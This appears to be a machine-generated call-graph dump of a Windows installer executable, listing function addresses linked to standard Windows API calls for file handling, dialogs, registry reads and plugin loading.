4611 406097 lstrlenW 4612 4060a2 4611->4612 4611->4616 4613 405f37 3 API calls 4612->4613 4615 4060a7 GetFileAttributesW 4613->4615 4615->4609 4616->4609 4616->4611 4617 405f83 2 API calls 4616->4617 4818 40699e FindFirstFileW 4616->4818 4617->4611 4618->4470 4619->4477 4621 406a35 5 API calls 4620->4621 4622 403a61 lstrcatW 4621->4622 4622->4461 4622->4462 4624 403aa7 4623->4624 4625 405bea GetLastError 4623->4625 4624->4476 4625->4624 4626 405bf9 SetFileSecurityW 4625->4626 4626->4624 4627 405c0f GetLastError 4626->4627 4627->4624 4629 405c2a GetLastError 4628->4629 4630 405c26 4628->4630 4629->4630 4630->4476 4631->4479 4632->4489 4644 4066b2 4633->4644 4634 4068d5 4635 403b0d DeleteFileW 4634->4635 4823 406668 lstrcpynW 4634->4823 4635->4484 4635->4489 4637 4068a3 lstrlenW 4637->4644 4638 406536 3 API calls 4638->4644 4639 4066a5 10 API calls 4639->4637 4640 4067ba GetSystemDirectoryW 4640->4644 4643 4067cd GetWindowsDirectoryW 4643->4644 4644->4634 4644->4637 4644->4638 4644->4639 4644->4640 4644->4643 4645 4066a5 10 API calls 4644->4645 4646 406844 lstrcatW 4644->4646 4647 4068ef 5 API calls 4644->4647 4648 4067fc SHGetSpecialFolderLocation 4644->4648 4821 4065af wsprintfW 4644->4821 4822 406668 lstrcpynW 4644->4822 4645->4644 4646->4644 4647->4644 4648->4644 4649 406814 SHGetPathFromIDListW CoTaskMemFree 4648->4649 4649->4644 4651 406449 4650->4651 4652 40643c 4650->4652 4651->4489 4824 4062ae 4652->4824 4655 405c8a 4654->4655 4656 405c7e CloseHandle 4654->4656 4655->4489 4656->4655 4658 403c40 4657->4658 4659 403c36 CloseHandle 4657->4659 4660 403c54 4658->4660 4661 403c4a CloseHandle 4658->4661 4659->4658 4858 403c82 4660->4858 4661->4660 4669 405cdd 4666->4669 4667 403b89 ExitProcess 4668 405cf1 MessageBoxIndirectW 4668->4667 4669->4667 4669->4668 4671 401389 2 API calls 4670->4671 4672 401420 4671->4672 4672->4448 4680 4068fc 4673->4680 4674 406972 4675 406977 CharPrevW 4674->4675 4677 406998 4674->4677 4675->4674 4676 406965 CharNextW 4676->4674 4676->4680 4677->4510 4678 405f64 CharNextW 4678->4680 4679 406951 CharNextW 4679->4680 4680->4674 4680->4676 4680->4678 4680->4679 4681 406960 CharNextW 4680->4681 4681->4676 4683 405f53 lstrcatW 4682->4683 4684 40362d 4682->4684 4683->4684 4684->4513 4686 406194 GetTickCount GetTempFileNameW 4685->4686 4687 40363e 4686->4687 4688 4061ca 4686->4688 4687->4425 4688->4686 4688->4687 4689->4519 4690->4521 4692 405f91 4691->4692 4693 40313c 4692->4693 4694 405f97 CharPrevW 4692->4694 4695 406668 lstrcpynW 4693->4695 4694->4692 4694->4693 4695->4525 4697 403057 4696->4697 4698 40303f 4696->4698 4701 403067 GetTickCount 4697->4701 4702 40305f 4697->4702 4699 403048 DestroyWindow 4698->4699 4700 40304f 4698->4700 4699->4700 4700->4531 4700->4546 4730 4035f8 SetFilePointer 4700->4730 4701->4700 4704 403075 4701->4704 4731 406a71 4702->4731 4705 4030aa CreateDialogParamW ShowWindow 4704->4705 4706 40307d 4704->4706 4705->4700 4706->4700 4735 403012 4706->4735 4708 40308b wsprintfW 4738 4056ca 4708->4738 4711->4544 4713 403380 SetFilePointer 4712->4713 4714 40339c 4712->4714 4713->4714 4749 403479 GetTickCount 4714->4749 4719 403479 42 API calls 4720 4033d3 4719->4720 4721 40343f ReadFile 4720->4721 4723 403439 4720->4723 4724 4033e2 4720->4724 4721->4723 4723->4546 4724->4723 4725 4061db ReadFile 4724->4725 4764 40620a WriteFile 4724->4764 4725->4724 4728 4061db ReadFile 4727->4728 4729 4035f5 4728->4729 4729->4527 4730->4536 4732 406a8e PeekMessageW 4731->4732 4733 406a84 DispatchMessageW 4732->4733 4734 406a9e 4732->4734 4733->4732 4734->4700 4736 403021 4735->4736 4737 403023 MulDiv 4735->4737 4736->4737 4737->4708 4739 4056e5 4738->4739 4748 4030a8 4738->4748 4740 405701 lstrlenW 4739->4740 4741 4066a5 17 API calls 4739->4741 4742 40572a 4740->4742 4743 40570f lstrlenW 4740->4743 4741->4740 4745 405730 SetWindowTextW 4742->4745 4746 40573d 4742->4746 4744 405721 lstrcatW 4743->4744 4743->4748 4744->4742 4745->4746 4747 405743 SendMessageW SendMessageW SendMessageW 4746->4747 4746->4748 4747->4748 4748->4700 4750 4035d1 4749->4750 4751 4034a7 4749->4751 4753 40302e 32 API calls 4750->4753 4766 4035f8 SetFilePointer 4751->4766 4759 4033a3 4753->4759 4754 4034b2 SetFilePointer 4758 4034d7 4754->4758 4755 4035e2 ReadFile 4755->4758 4757 40302e 32 API calls 4757->4758 4758->4755 4758->4757 4758->4759 4760 40620a WriteFile 4758->4760 4761 4035b2 SetFilePointer 4758->4761 4767 406bb0 4758->4767 4759->4723 4762 4061db ReadFile 4759->4762 4760->4758 4761->4750 4763 4033bc 4762->4763 4763->4719 4763->4723 4765 406228 4764->4765 4765->4724 4766->4754 4768 406bd5 4767->4768 4769 406bdd 4767->4769 4768->4758 4769->4768 4770 406c64 GlobalFree 4769->4770 4771 406c6d GlobalAlloc 4769->4771 4772 406ce4 GlobalAlloc 4769->4772 4773 406cdb GlobalFree 4769->4773 4770->4771 4771->4768 4771->4769 4772->4768 4772->4769 4773->4772 4774->4554 4776 404001 4775->4776 4796 4065af wsprintfW 4776->4796 4778 404072 4797 4040a6 4778->4797 4780 403da2 4780->4560 4781 404077 4781->4780 4782 4066a5 17 API calls 4781->4782 4782->4781 4800 404610 4783->4800 4785 4057c0 4789 4057e7 4785->4789 4803 401389 4785->4803 4786 404610 SendMessageW 4787 4057f9 OleUninitialize 4786->4787 4787->4593 4789->4786 4807 4064d5 4790->4807 4793 403d73 4793->4556 4793->4557 4794 40656a RegQueryValueExW RegCloseKey 4794->4793 4795->4562 4796->4778 4798 4066a5 17 API calls 4797->4798 4799 4040b4 SetWindowTextW 4798->4799 4799->4781 4801 404628 4800->4801 4802 404619 SendMessageW 4800->4802 4801->4785 4802->4801 4805 401390 4803->4805 4804 4013fe 4804->4785 4805->4804 4806 4013cb MulDiv SendMessageW 4805->4806 4806->4805 4808 4064e4 4807->4808 4809 4064e8 4808->4809 4810 4064ed RegOpenKeyExW 4808->4810 4809->4793 4809->4794 4810->4809 4811->4606 4813 405fff 4812->4813 4817 406011 4812->4817 4814 40600c CharNextW 4813->4814 4813->4817 4815 406035 4814->4815 4815->4609 4815->4610 4816 405f64 CharNextW 4816->4817 4817->4815 4817->4816 4819 4069b4 FindClose 4818->4819 4820 4069bf 4818->4820 4819->4820 4820->4616 4821->4644 4822->4644 4823->4635 4825 406304 GetShortPathNameW 4824->4825 4826 4062de 4824->4826 4828 406423 4825->4828 4829 406319 4825->4829 4851 406158 GetFileAttributesW CreateFileW 4826->4851 4828->4651 4829->4828 4831 406321 wsprintfA 4829->4831 4830 4062e8 CloseHandle GetShortPathNameW 4830->4828 4832 4062fc 4830->4832 4833 4066a5 17 API calls 4831->4833 4832->4825 4832->4828 4834 406349 4833->4834 4852 406158 GetFileAttributesW CreateFileW 4834->4852 4836 406356 4836->4828 4837 406365 GetFileSize GlobalAlloc 4836->4837 4838 406387 4837->4838 4839 40641c CloseHandle 4837->4839 4840 4061db ReadFile 4838->4840 4839->4828 4841 40638f 4840->4841 4841->4839 4853 4060bd lstrlenA 4841->4853 4844 4063a6 lstrcpyA 4847 4063c8 4844->4847 4845 4063ba 4846 4060bd 4 API calls 4845->4846 4846->4847 4848 4063ff SetFilePointer 4847->4848 4849 40620a WriteFile 4848->4849 4850 406415 GlobalFree 4849->4850 4850->4839 4851->4830 4852->4836 4854 4060fe lstrlenA 4853->4854 4855 4060d7 lstrcmpiA 4854->4855 4857 406106 4854->4857 4856 4060f5 CharNextA 4855->4856 4855->4857 4856->4854 4857->4844 4857->4845 4859 403c90 4858->4859 4860 403c59 4859->4860 4861 403c95 FreeLibrary GlobalFree 4859->4861 4862 405d74 4860->4862 4861->4860 4861->4861 4863 40603f 18 API calls 4862->4863 4864 405d94 4863->4864 4865 405db3 4864->4865 4866 405d9c DeleteFileW 4864->4866 4868 405ede 4865->4868 4902 406668 lstrcpynW 4865->4902 4867 403b71 OleUninitialize 4866->4867 4867->4444 4867->4445 4868->4867 4875 40699e 2 API calls 4868->4875 4870 405dd9 4871 405dec 4870->4871 4872 405ddf lstrcatW 4870->4872 4874 405f83 2 API calls 4871->4874 4873 405df2 4872->4873 4876 405e02 lstrcatW 4873->4876 4877 405df8 4873->4877 4874->4873 4878 405ef8 4875->4878 4879 405e0d lstrlenW FindFirstFileW 4876->4879 4877->4876 4877->4879 4878->4867 4880 405efc 4878->4880 4881 405ed3 4879->4881 4900 405e2f 4879->4900 4882 405f37 3 API calls 4880->4882 4881->4868 4883 405f02 4882->4883 4886 405d2c 5 API calls 4883->4886 4885 405eb6 FindNextFileW 4888 405ecc FindClose 4885->4888 4885->4900 4887 405f0e 4886->4887 4889 405f12 4887->4889 4890 405f28 4887->4890 4888->4881 4889->4867 4893 4056ca 24 API calls 4889->4893 4892 4056ca 24 API calls 4890->4892 4892->4867 4895 405f1f 4893->4895 4894 405d74 60 API calls 4894->4900 4897 406428 36 API calls 4895->4897 4896 4056ca 24 API calls 4896->4885 4898 405f26 4897->4898 4898->4867 4899 4056ca 24 API calls 4899->4900 4900->4885 4900->4894 4900->4896 4900->4899 4901 406428 36 API calls 4900->4901 4903 406668 lstrcpynW 4900->4903 4904 405d2c 4900->4904 4901->4900 4902->4870 4903->4900 4912 406133 GetFileAttributesW 4904->4912 4906 405d59 4906->4900 4908 405d47 RemoveDirectoryW 4910 405d55 4908->4910 4909 405d4f DeleteFileW 4909->4910 4910->4906 4911 405d65 SetFileAttributesW 4910->4911 4911->4906 4913 405d38 4912->4913 4914 406145 SetFileAttributesW 4912->4914 4913->4906 4913->4908 4913->4909 4914->4913 4915 401941 4916 401943 4915->4916 4921 402da6 4916->4921 4919 405d74 67 API calls 4920 401951 4919->4920 4922 402db2 4921->4922 4923 4066a5 17 API calls 4922->4923 4924 402dd3 4923->4924 4925 401948 4924->4925 4926 4068ef 5 API calls 4924->4926 4925->4919 4926->4925 4927 4015c1 4928 402da6 17 API calls 4927->4928 4929 4015c8 4928->4929 4930 405fe2 4 API calls 4929->4930 4935 4015d1 4930->4935 4931 401631 4933 401663 4931->4933 4934 401636 4931->4934 4932 405f64 CharNextW 4932->4935 4938 401423 24 API calls 4933->4938 4946 401423 4934->4946 4935->4931 4935->4932 4940 405c16 2 API calls 4935->4940 4941 405c33 5 API calls 4935->4941 4944 401617 GetFileAttributesW 4935->4944 4945 405b99 4 API calls 4935->4945 4943 40165b 4938->4943 4940->4935 4941->4935 4942 40164a SetCurrentDirectoryW 4942->4943 4944->4935 4945->4935 4947 4056ca 24 API calls 4946->4947 4948 401431 4947->4948 4949 406668 lstrcpynW 4948->4949 4949->4942 5487 401c43 5488 402d84 17 API calls 5487->5488 5489 401c4a 5488->5489 5490 402d84 17 API calls 5489->5490 5491 401c57 5490->5491 5492 401c6c 5491->5492 5493 402da6 17 API calls 5491->5493 5494 401c7c 5492->5494 5495 402da6 17 API calls 5492->5495 5493->5492 5496 401cd3 5494->5496 5497 401c87 5494->5497 5495->5494 5498 402da6 17 API calls 5496->5498 5499 402d84 17 API calls 5497->5499 5500 401cd8 5498->5500 5501 401c8c 5499->5501 5502 402da6 17 API calls 5500->5502 5503 402d84 17 API calls 5501->5503 5505 401ce1 FindWindowExW 5502->5505 5504 401c98 5503->5504 5506 401cc3 SendMessageW 5504->5506 5507 401ca5 SendMessageTimeoutW 5504->5507 5508 401d03 5505->5508 5506->5508 5507->5508 5798 4028c4 5799 4028ca 5798->5799 5800 4028d2 FindClose 5799->5800 5801 402c2a 5799->5801 5800->5801 4975 4040c5 4976 4040dd 4975->4976 4977 40423e 4975->4977 4976->4977 4980 4040e9 4976->4980 4978 40428f 4977->4978 4979 40424f GetDlgItem GetDlgItem 4977->4979 4984 4042e9 4978->4984 4994 401389 2 API calls 4978->4994 4983 4045c4 18 API calls 4979->4983 4981 4040f4 SetWindowPos 4980->4981 4982 404107 4980->4982 4981->4982 4986 404110 ShowWindow 4982->4986 4987 404152 4982->4987 4988 404279 SetClassLongW 4983->4988 4985 404610 SendMessageW 4984->4985 5000 404239 4984->5000 5021 4042fb 4985->5021 4989 404130 GetWindowLongW 4986->4989 4990 40422b 4986->4990 4991 404171 4987->4991 4992 40415a DestroyWindow 4987->4992 4993 40140b 2 API calls 4988->4993 4989->4990 4996 404149 ShowWindow 4989->4996 5057 40462b 4990->5057 4997 404176 SetWindowLongW 4991->4997 4998 404187 4991->4998 5047 40454d 4992->5047 4993->4978 4999 4042c1 4994->4999 4996->4987 4997->5000 4998->4990 5003 404193 GetDlgItem 4998->5003 4999->4984 5004 4042c5 SendMessageW 4999->5004 5001 40140b 2 API calls 5001->5021 5002 40454f DestroyWindow EndDialog 5002->5047 5006 4041c1 5003->5006 5007 4041a4 SendMessageW IsWindowEnabled 5003->5007 5004->5000 5005 40457e ShowWindow 5005->5000 5009 4041c6 5006->5009 5010 4041ce 5006->5010 5011 404215 SendMessageW 5006->5011 5012 4041e1 5006->5012 5007->5000 5007->5006 5008 4066a5 17 API calls 5008->5021 5054 40459d 5009->5054 5010->5009 5010->5011 5011->4990 5014 4041e9 5012->5014 5015 4041fe 5012->5015 5017 40140b 2 API calls 5014->5017 5018 40140b 2 API calls 5015->5018 5016 4041fc 5016->4990 5017->5009 5020 404205 5018->5020 5019 4045c4 18 API calls 5019->5021 5020->4990 5020->5009 5021->5000 5021->5001 5021->5002 5021->5008 5021->5019 5038 40448f DestroyWindow 5021->5038 5048 4045c4 5021->5048 5023 404376 GetDlgItem 5024 404393 ShowWindow KiUserCallbackDispatcher 5023->5024 5025 40438b 5023->5025 5051 4045e6 KiUserCallbackDispatcher 5024->5051 5025->5024 5027 4043bd EnableWindow 5032 4043d1 5027->5032 5028 4043d6 GetSystemMenu EnableMenuItem SendMessageW 5029 404406 SendMessageW 5028->5029 5028->5032 5029->5032 5031 4040a6 18 API calls 5031->5032 5032->5028 5032->5031 5052 4045f9 SendMessageW 5032->5052 5053 406668 lstrcpynW 5032->5053 5034 404435 lstrlenW 5035 4066a5 17 API calls 5034->5035 5036 40444b SetWindowTextW 5035->5036 5037 401389 2 API calls 5036->5037 5037->5021 5039 4044a9 CreateDialogParamW 5038->5039 5038->5047 5040 4044dc 5039->5040 5039->5047 5041 4045c4 18 API calls 5040->5041 5042 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5041->5042 5043 401389 2 API calls 5042->5043 5044 40452d 5043->5044 5044->5000 5045 404535 ShowWindow 5044->5045 5046 404610 SendMessageW 5045->5046 5046->5047 5047->5000 5047->5005 5049 4066a5 17 API calls 5048->5049 5050 4045cf SetDlgItemTextW 5049->5050 5050->5023 5051->5027 5052->5032 5053->5034 5055 4045a4 5054->5055 5056 4045aa SendMessageW 5054->5056 5055->5056 5056->5016 5058 4046ee 5057->5058 5059 404643 GetWindowLongW 5057->5059 5058->5000 5059->5058 5060 404658 5059->5060 5060->5058 5061 404685 GetSysColor 5060->5061 5062 404688 5060->5062 5061->5062 5063 404698 SetBkMode 5062->5063 5064 40468e SetTextColor 5062->5064 5065 4046b0 GetSysColor 5063->5065 5066 4046b6 5063->5066 5064->5063 5065->5066 5067 4046c7 5066->5067 5068 4046bd SetBkColor 5066->5068 5067->5058 5069 4046e1 CreateBrushIndirect 5067->5069 5070 4046da DeleteObject 5067->5070 5068->5067 5069->5058 5070->5069 5805 4016cc 5806 402da6 17 API calls 5805->5806 5807 4016d2 GetFullPathNameW 5806->5807 5808 4016ec 5807->5808 5814 40170e 5807->5814 5811 40699e 2 API calls 5808->5811 5808->5814 5809 401723 GetShortPathNameW 5810 402c2a 5809->5810 5812 4016fe 5811->5812 5812->5814 5815 406668 lstrcpynW 5812->5815 5814->5809 5814->5810 5815->5814 5509 401e4e GetDC 5510 402d84 17 API calls 5509->5510 5511 401e60 GetDeviceCaps MulDiv ReleaseDC 5510->5511 5512 402d84 17 API calls 5511->5512 5513 401e91 5512->5513 5514 4066a5 17 API calls 5513->5514 5515 401ece CreateFontIndirectW 5514->5515 5516 402638 5515->5516 5954 402950 5955 402da6 17 API calls 5954->5955 5957 40295c 5955->5957 5956 402972 5959 406133 2 API calls 5956->5959 5957->5956 5958 402da6 17 API calls 5957->5958 5958->5956 5960 402978 5959->5960 5982 406158 GetFileAttributesW CreateFileW 5960->5982 5962 402985 5963 402a3b 5962->5963 5964 4029a0 GlobalAlloc 5962->5964 5965 402a23 5962->5965 5966 402a42 DeleteFileW 5963->5966 5967 402a55 5963->5967 5964->5965 5968 4029b9 5964->5968 5969 403371 44 API calls 5965->5969 5966->5967 5983 4035f8 SetFilePointer 5968->5983 5971 402a30 CloseHandle 5969->5971 5971->5963 5972 4029bf 5973 4035e2 ReadFile 5972->5973 5974 4029c8 GlobalAlloc 5973->5974 5975 4029d8 5974->5975 5976 402a0c 5974->5976 5977 403371 44 API calls 5975->5977 5978 40620a WriteFile 5976->5978 5981 4029e5 5977->5981 5979 402a18 GlobalFree 5978->5979 5979->5965 5980 402a03 GlobalFree 5980->5976 5981->5980 5982->5962 5983->5972 5984 6f131000 5987 6f13101b 5984->5987 5994 6f13156c 5987->5994 5989 6f131020 5990 6f131032 5989->5990 5991 6f131024 GlobalAlloc 5989->5991 5992 6f1315c5 3 API calls 5990->5992 5991->5990 5993 6f131019 5992->5993 5996 6f131572 5994->5996 5995 6f131578 5995->5989 5996->5995 5997 6f131584 GlobalFree 5996->5997 5997->5989 5816 403cd5 5817 403ce0 5816->5817 5818 403ce7 GlobalAlloc 5817->5818 5819 403ce4 5817->5819 5818->5819 5998 401956 5999 402da6 17 API calls 5998->5999 6000 40195d lstrlenW 5999->6000 6001 402638 6000->6001 5820 4014d7 5821 402d84 17 API calls 5820->5821 5822 4014dd Sleep 5821->5822 5824 402c2a 5822->5824 5418 4020d8 5419 40219c 5418->5419 5420 4020ea 5418->5420 5422 401423 24 API calls 5419->5422 5421 402da6 17 API calls 5420->5421 5423 4020f1 5421->5423 5425 4022f6 5422->5425 5424 402da6 17 API calls 5423->5424 5426 4020fa 5424->5426 5427 402110 LoadLibraryExW 5426->5427 5428 402102 GetModuleHandleW 5426->5428 5427->5419 5429 402121 5427->5429 5428->5427 5428->5429 5438 406aa4 5429->5438 5432 402132 5435 401423 24 API calls 5432->5435 5436 402142 5432->5436 5433 40216b 5434 4056ca 24 API calls 5433->5434 5434->5436 5435->5436 5436->5425 5437 40218e FreeLibrary 5436->5437 5437->5425 5443 40668a WideCharToMultiByte 5438->5443 5440 406ac1 5441 406ac8 GetProcAddress 5440->5441 5442 40212c 5440->5442 5441->5442 5442->5432 5442->5433 5443->5440 5524 6f131b0a 5525 6f131b38 5524->5525 5526 6f132351 21 API calls 5525->5526 5527 6f131b3f 5526->5527 5528 6f131b52 5527->5528 5529 6f131b46 5527->5529 5531 6f131b73 5528->5531 5532 6f131b5c 5528->5532 5530 6f1315eb 2 API calls 5529->5530 5535 6f131b50 5530->5535 5533 6f131b79 5531->5533 5534 6f131b9f 5531->5534 5536 6f1315c5 3 API calls 5532->5536 5537 6f131668 3 API calls 5533->5537 5538 6f1315c5 3 API calls 5534->5538 5539 6f131b61 5536->5539 5540 6f131b7e 5537->5540 5538->5535 5541 6f131668 3 API calls 5539->5541 5542 6f1315eb 2 API calls 5540->5542 5543 6f131b67 5541->5543 5544 6f131b84 GlobalFree 5542->5544 5545 6f1315eb 2 API calls 5543->5545 5544->5535 5546 6f131b6d GlobalFree 5544->5546 5545->5546 6002 402b59 6003 402b60 6002->6003 6004 402bab 6002->6004 6005 402ba9 6003->6005 6008 402d84 17 API calls 6003->6008 6006 406a35 5 API calls 6004->6006 6007 402bb2 6006->6007 6009 402da6 17 API calls 6007->6009 6010 402b6e 6008->6010 6011 402bbb 6009->6011 6012 402d84 17 API calls 6010->6012 6011->6005 6013 402bbf IIDFromString 6011->6013 6015 402b7a 6012->6015 6013->6005 6014 402bce 6013->6014 6014->6005 6020 406668 lstrcpynW 6014->6020 6019 4065af wsprintfW 6015->6019 6017 402beb CoTaskMemFree 6017->6005 6019->6005 6020->6017 5548 402a5b 5549 402d84 17 API calls 5548->5549 5550 402a61 5549->5550 5551 402aa4 5550->5551 5552 402a88 5550->5552 5558 40292e 5550->5558 5553 402abe 5551->5553 5554 402aae 5551->5554 5555 402a8d 5552->5555 5561 402a9e 5552->5561 5557 4066a5 17 API calls 5553->5557 5556 402d84 17 API calls 5554->5556 5562 406668 lstrcpynW 5555->5562 5556->5561 5557->5561 5561->5558 5563 4065af wsprintfW 5561->5563 5562->5558 5563->5558 5470 40175c 5471 402da6 17 API calls 5470->5471 5472 401763 5471->5472 5473 406187 2 API calls 5472->5473 5474 40176a 5473->5474 5475 406187 2 API calls 5474->5475 5475->5474 6021 401d5d 6022 402d84 17 API calls 6021->6022 6023 401d6e SetWindowLongW 6022->6023 6024 402c2a 6023->6024 5825 4028de 5826 4028e6 5825->5826 5827 4028ea FindNextFileW 5826->5827 5830 4028fc 5826->5830 5828 402943 5827->5828 5827->5830 5831 406668 lstrcpynW 5828->5831 5831->5830 6025 406d5f 6029 406be3 6025->6029 6026 40754e 6027 406c64 GlobalFree 6028 406c6d GlobalAlloc 6027->6028 6028->6026 6028->6029 6029->6026 6029->6027 6029->6028 6030 406ce4 GlobalAlloc 6029->6030 6031 406cdb GlobalFree 6029->6031 6030->6026 6030->6029 6031->6030 6032 401563 6033 402ba4 6032->6033 6036 4065af wsprintfW 6033->6036 6035 402ba9 6036->6035 6037 401968 6038 402d84 17 API calls 6037->6038 6039 40196f 6038->6039 6040 402d84 17 API calls 6039->6040 6041 40197c 6040->6041 6042 402da6 17 API calls 6041->6042 6043 401993 lstrlenW 6042->6043 6045 4019a4 6043->6045 6044 4019e5 6045->6044 6049 406668 lstrcpynW 6045->6049 6047 4019d5 6047->6044 6048 4019da lstrlenW 6047->6048 6048->6044 6049->6047 6050 6f13103a 6051 6f131052 6050->6051 6052 6f1310c5 6051->6052 6053 6f131081 6051->6053 6054 6f131061 6051->6054 6055 6f13156c GlobalFree 6053->6055 6056 6f13156c GlobalFree 6054->6056 6061 6f131079 6055->6061 6057 6f131072 6056->6057 6059 6f13156c GlobalFree 6057->6059 6058 6f131091 GlobalSize 6060 6f13109a 6058->6060 6059->6061 6062 6f1310af 6060->6062 6063 6f13109e GlobalAlloc 6060->6063 6061->6058 6061->6060 6065 6f1310b8 GlobalFree 6062->6065 6064 6f1315c5 3 API calls 6063->6064 6064->6062 6065->6052 5571 40166a 5572 402da6 17 API calls 5571->5572 5573 401670 5572->5573 5574 40699e 2 API calls 5573->5574 5575 401676 5574->5575 5832 402aeb 5833 402d84 17 API calls 5832->5833 5834 402af1 5833->5834 5835 40292e 5834->5835 5836 4066a5 17 API calls 5834->5836 5836->5835 5327 4026ec 5328 402d84 17 API calls 5327->5328 5330 4026fb 5328->5330 5329 402838 5330->5329 5331 402745 ReadFile 5330->5331 5332 4027de 5330->5332 5333 4061db ReadFile 5330->5333 5335 402785 MultiByteToWideChar 5330->5335 5336 40283a 5330->5336 5338 4027ab SetFilePointer MultiByteToWideChar 5330->5338 5339 40284b 5330->5339 5331->5329 5331->5330 5332->5329 5332->5330 5341 406239 SetFilePointer 5332->5341 5333->5330 5335->5330 5350 4065af wsprintfW 5336->5350 5338->5330 5339->5329 5340 40286c SetFilePointer 5339->5340 5340->5329 5342 406255 5341->5342 5345 40626d 5341->5345 5343 4061db ReadFile 5342->5343 5344 406261 5343->5344 5344->5345 5346 406276 SetFilePointer 5344->5346 5347 40629e SetFilePointer 5344->5347 5345->5332 5346->5347 5348 406281 5346->5348 5347->5345 5349 40620a WriteFile 5348->5349 5349->5345 5350->5329 6148 6f132ebf 6149 6f132ed7 6148->6149 6150 6f131309 2 API calls 6149->6150 6151 6f132ef2 6150->6151 5576 404a6e 5577 404aa4 5576->5577 5578 404a7e 5576->5578 5580 40462b 8 API calls 5577->5580 5579 4045c4 18 API calls 5578->5579 5581 404a8b SetDlgItemTextW 5579->5581 5582 404ab0 5580->5582 5581->5577 5351 40176f 5352 402da6 17 API calls 5351->5352 5353 401776 5352->5353 5354 401796 5353->5354 5355 40179e 5353->5355 5390 406668 lstrcpynW 5354->5390 5391 406668 lstrcpynW 5355->5391 5358 40179c 5362 4068ef 5 API calls 5358->5362 5359 4017a9 5360 405f37 3 API calls 5359->5360 5361 4017af lstrcatW 5360->5361 5361->5358 5378 4017bb 5362->5378 5363 40699e 2 API calls 5363->5378 5364 406133 2 API calls 5364->5378 5366 4017cd CompareFileTime 5366->5378 5367 40188d 5368 4056ca 24 API calls 5367->5368 5370 401897 5368->5370 5369 401864 5371 4056ca 24 API calls 5369->5371 5387 401879 5369->5387 5373 403371 44 API calls 5370->5373 5371->5387 5372 406668 lstrcpynW 5372->5378 5374 4018aa 5373->5374 5375 4018be SetFileTime 5374->5375 5377 4018d0 CloseHandle 5374->5377 5375->5377 5376 4066a5 17 API calls 5376->5378 5379 4018e1 5377->5379 5377->5387 5378->5363 5378->5364 5378->5366 5378->5367 5378->5369 5378->5372 5378->5376 5384 405cc8 MessageBoxIndirectW 5378->5384 5389 406158 GetFileAttributesW CreateFileW 5378->5389 5380 4018e6 5379->5380 5381 4018f9 5379->5381 5382 4066a5 17 API calls 5380->5382 5383 4066a5 17 API calls 5381->5383 5385 4018ee lstrcatW 5382->5385 5386 401901 5383->5386 5384->5378 5385->5386 5386->5387 5388 405cc8 MessageBoxIndirectW 5386->5388 5388->5387 5389->5378 5390->5358 5391->5359 5583 401a72 5584 402d84 17 API calls 5583->5584 5585 401a7b 5584->5585 5586 402d84 17 API calls 5585->5586 5587 401a20 5586->5587 6066 401573 6067 401583 ShowWindow 6066->6067 6068 40158c 6066->6068 6067->6068 6069 402c2a 6068->6069 6070 40159a ShowWindow 6068->6070 6070->6069 5411 4023f4 5412 402da6 17 API calls 5411->5412 5413 402403 5412->5413 5414 402da6 17 API calls 5413->5414 5415 40240c 5414->5415 5416 402da6 17 API calls 5415->5416 5417 402416 GetPrivateProfileStringW 5416->5417 6152 6f131aa7 6153 6f13156c GlobalFree 6152->6153 6156 6f131abf 6153->6156 6154 6f131b01 GlobalFree 6155 6f131add 6155->6154 6156->6154 6156->6155 6157 6f131aed VirtualFree 6156->6157 6157->6154 5837 4014f5 SetForegroundWindow 5838 402c2a 5837->5838 6158 401ff6 6159 402da6 17 API calls 6158->6159 6160 401ffd 6159->6160 6161 40699e 2 API calls 6160->6161 6162 402003 6161->6162 6164 402014 6162->6164 6165 4065af wsprintfW 6162->6165 6165->6164 6071 401b77 6072 402da6 17 API calls 6071->6072 6073 401b7e 6072->6073 6074 402d84 17 API calls 6073->6074 6075 401b87 wsprintfW 6074->6075 6076 402c2a 6075->6076 5839 4046fa lstrcpynW lstrlenW 5588 40167b 5589 402da6 17 API calls 5588->5589 5590 401682 5589->5590 5591 402da6 17 API calls 5590->5591 5592 40168b 5591->5592 5593 402da6 17 API calls 5592->5593 5594 401694 MoveFileW 5593->5594 5595 4016a0 5594->5595 5596 4016a7 5594->5596 5597 401423 24 API calls 5595->5597 5598 40699e 2 API calls 5596->5598 5600 4022f6 5596->5600 5597->5600 5599 4016b6 5598->5599 5599->5600 5601 406428 36 API calls 5599->5601 5601->5595 5840 4022ff 5841 402da6 17 API calls 5840->5841 5842 402305 5841->5842 5843 402da6 17 API calls 5842->5843 5844 40230e 5843->5844 5845 402da6 17 API calls 5844->5845 5846 402317 5845->5846 5847 40699e 2 API calls 5846->5847 5848 402320 5847->5848 5849 402331 lstrlenW lstrlenW 5848->5849 5853 402324 5848->5853 5851 4056ca 24 API calls 5849->5851 5850 4056ca 24 API calls 5854 40232c 5850->5854 5852 40236f SHFileOperationW 5851->5852 5852->5853 5852->5854 5853->5850 5853->5854 6173 4019ff 6174 402da6 17 API calls 6173->6174 6175 401a06 6174->6175 6176 402da6 17 API calls 6175->6176 6177 401a0f 6176->6177 6178 401a16 lstrcmpiW 6177->6178 6179 401a28 lstrcmpW 6177->6179 6180 401a1c 6178->6180 6179->6180 5602 401000 5603 401037 BeginPaint GetClientRect 5602->5603 5604 40100c DefWindowProcW 5602->5604 5606 4010f3 5603->5606 5609 401179 5604->5609 5607 401073 CreateBrushIndirect FillRect DeleteObject 5606->5607 5608 4010fc 5606->5608 5607->5606 5610 401102 CreateFontIndirectW 5608->5610 5611 401167 EndPaint 5608->5611 5610->5611 5612 401112 6 API calls 5610->5612 5611->5609 5612->5611 6181 401d81 6182 401d94 GetDlgItem 6181->6182 6183 401d87 6181->6183 6186 401d8e 6182->6186 6184 402d84 17 API calls 6183->6184 6184->6186 6185 401dd5 GetClientRect LoadImageW SendMessageW 6189 401e33 6185->6189 6191 401e3f 6185->6191 6186->6185 6187 402da6 17 API calls 6186->6187 6187->6185 6190 401e38 DeleteObject 6189->6190 6189->6191 6190->6191 6077 401503 6078 40150b 6077->6078 6080 40151e 6077->6080 6079 402d84 17 API calls 6078->6079 6079->6080 6192 404783 6193 40479b 6192->6193 6197 4048b5 6192->6197 6198 4045c4 18 API calls 6193->6198 6194 40491f 6195 4049e9 6194->6195 6196 404929 GetDlgItem 6194->6196 6203 40462b 8 API calls 6195->6203 6199 404943 6196->6199 6200 4049aa 6196->6200 6197->6194 6197->6195 6201 4048f0 GetDlgItem SendMessageW 6197->6201 6202 404802 6198->6202 6199->6200 6207 404969 SendMessageW LoadCursorW SetCursor 6199->6207 6200->6195 6204 4049bc 6200->6204 